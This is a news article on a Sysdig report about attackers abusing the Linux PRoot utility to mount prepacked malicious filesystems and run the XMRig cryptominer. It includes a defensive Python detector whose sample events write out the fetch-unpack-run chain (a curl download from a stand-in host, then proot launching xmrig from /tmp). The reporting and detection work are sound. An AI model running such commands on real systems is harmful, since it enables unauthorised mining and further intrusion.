Hackers abuse the open-source Linux PRoot utility in BYOF (Bring Your Own Filesystem) attacks to provide a consistent repository of malicious tools that run on many Linux distributions.

A Bring Your Own Filesystem attack occurs when hackers create a malicious filesystem on their own devices that contains a standard set of tools used to carry out attacks.

This file system is then downloaded and mounted on compromised machines, providing a preconfigured toolkit that can be used to further compromise a Linux system.

“First, hackers build a malicious filesystem that will be deployed. This malicious filesystem includes everything the operation needs to succeed,” says a new report from Sysdig.

“Doing this preparation at this early stage allows all tools to be downloaded, configured or installed on the attacker’s own system away from the prying eyes of detection tools.”

Sysdig says attacks typically lead to cryptocurrency mining, although more dangerous scenarios are possible.

The researchers also warn that this technique could make it much easier to scale malicious operations against Linux endpoints of all kinds.

Abuse of the Linux PRoot utility

PRoot is an open source utility that combines the functionality of ‘chroot’, ‘mount --bind’ and ‘binfmt_misc’, allowing users to set up an isolated root filesystem on Linux.

By default, PRoot processes are confined to the guest filesystem; however, QEMU emulation can be used to mix the execution of host and guest programs.

Additionally, guest file system programs can use the built-in mount/link mechanism to access host system files and directories.

The attacks seen by Sysdig use PRoot to deploy, on already compromised systems, a malicious filesystem that includes network scanning tools such as “masscan” and “nmap”, the XMRig cryptominer, and their configuration files.

The filesystem contains everything needed for the attack, neatly packaged in a Gzip-compressed tar file with all necessary dependencies, downloaded directly from trusted cloud hosting services like Dropbox.

The malicious guest file system (Sysdig)

As PRoot is statically compiled and does not require any dependencies, hackers simply download the precompiled binary from GitLab and run it against the downloaded and extracted filesystem to mount it.

In most cases seen by Sysdig, attackers unpacked the filesystem to ‘/tmp/Proot/’ and then activated the XMRig cryptominer.

“Any dependencies or configurations are also included in the filesystem, so the attacker does not need to run any additional configuration commands,” Sysdig explains.

“The attacker runs PRoot, points it to the decompressed malicious filesystem, and specifies the XMRig binary to run.”

Launching XMRig on the guest filesystem to mine using the host’s GPU (Sysdig)
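As an added illustration from the defender's side (this is not code from Sysdig or from the article), the chain described above leaves a recognisable footprint in process-execution telemetry: a proot binary run from a world-writable path, pointed at a guest rootfs under /tmp, launching a miner. The event format, usernames, paths and hostname below are constructed; the PRoot rootfs options (-r, -R, -S, --rootfs) are the real ones.

```python
import os
import shlex
from typing import List, Optional, Tuple

# Constructed sample process-execution events ("pid user cmdline" per line), not real
# telemetry. Events 4101-4103 mirror the chain described above: fetch the packed
# filesystem, unpack it under /tmp/Proot/, run proot against it to launch XMRig.
SAMPLE_EVENTS = """\
4101 www-data curl -sLo /tmp/fs.tar.gz https://files.example.invalid/fs.tar.gz
4102 www-data tar -xzf /tmp/fs.tar.gz -C /tmp/Proot/
4103 www-data /tmp/proot -S /tmp/Proot/ /usr/bin/xmrig
2201 alice proot -r /home/alice/ubuntu-rootfs /bin/bash
3010 root tar -xzf /opt/backup.tar.gz -C /var/backups/
"""

WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")
ROOTFS_FLAGS = {"-r", "--rootfs", "-R", "-S"}  # PRoot options that pick the guest rootfs
MINER_NAMES = ("xmrig",)                       # the payload named in the report

Finding = Tuple[int, str, Optional[str], List[str]]  # (pid, user, rootfs, reasons)

def guest_rootfs(argv: List[str]) -> Optional[str]:
    """Return the guest rootfs path passed to proot, or None if absent."""
    for i, tok in enumerate(argv):
        if tok.startswith("--rootfs="):
            return tok.split("=", 1)[1]
        if tok in ROOTFS_FLAGS and i + 1 < len(argv):
            return argv[i + 1]
    return None

def analyse_event(line: str) -> Optional[Finding]:
    """Return a finding for a proot execution, with reasons it matches the BYOF pattern."""
    pid, user, cmdline = line.split(maxsplit=2)
    argv = shlex.split(cmdline)
    if not argv or os.path.basename(argv[0]) != "proot":
        return None
    rootfs, reasons = guest_rootfs(argv), []
    if argv[0].startswith(WORLD_WRITABLE):
        reasons.append("proot binary executed from a world-writable directory")
    if rootfs and rootfs.startswith(WORLD_WRITABLE):
        reasons.append("guest rootfs lives under a world-writable directory")
    if any(m in tok.lower() for tok in argv[1:] for m in MINER_NAMES):
        reasons.append("guest command references a known miner")
    return int(pid), user, rootfs, reasons

def scan(events: str) -> List[Finding]:
    """One finding per proot execution; an empty reasons list means benign-looking."""
    return [f for f in map(analyse_event, events.splitlines()) if f]
```

Event 2201 shows why the rule keys on where the rootfs and binary live rather than on proot itself: a developer running a rootfs from their home directory produces a finding with no reasons, while the /tmp chain accumulates three.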

As Sysdig points out in the report, threat actors could easily use PRoot to download other payloads besides XMRig, potentially causing more severe damage to the hacked system.

The presence of “masscan” on the malicious file system implies an aggressive attitude on the part of the attackers, probably indicating that they plan to breach other systems from the compromised machine.

Streamlining attacks

Hackers’ misuse of PRoot makes these post-exploitation attacks platform- and distribution-independent, increasing threat actors’ chances of success and stealth.

Additionally, preconfigured PRoot filesystems allow attackers to use a toolkit on many OS configurations without having to port their malware to the targeted architecture or include build dependencies and tools.

“By using PRoot, there is little regard or concern for the architecture or distribution of the target since the tool mitigates attack difficulties often associated with executable compatibility, environment configuration and execution of malware and/or miners,” says Sysdig.

“It allows attackers to get closer to the ‘write once, run everywhere’ philosophy, which has been a long-sought goal.”

PRoot-backed attacks render environment configuration irrelevant to hackers, allowing them to rapidly scale up their malicious operations.
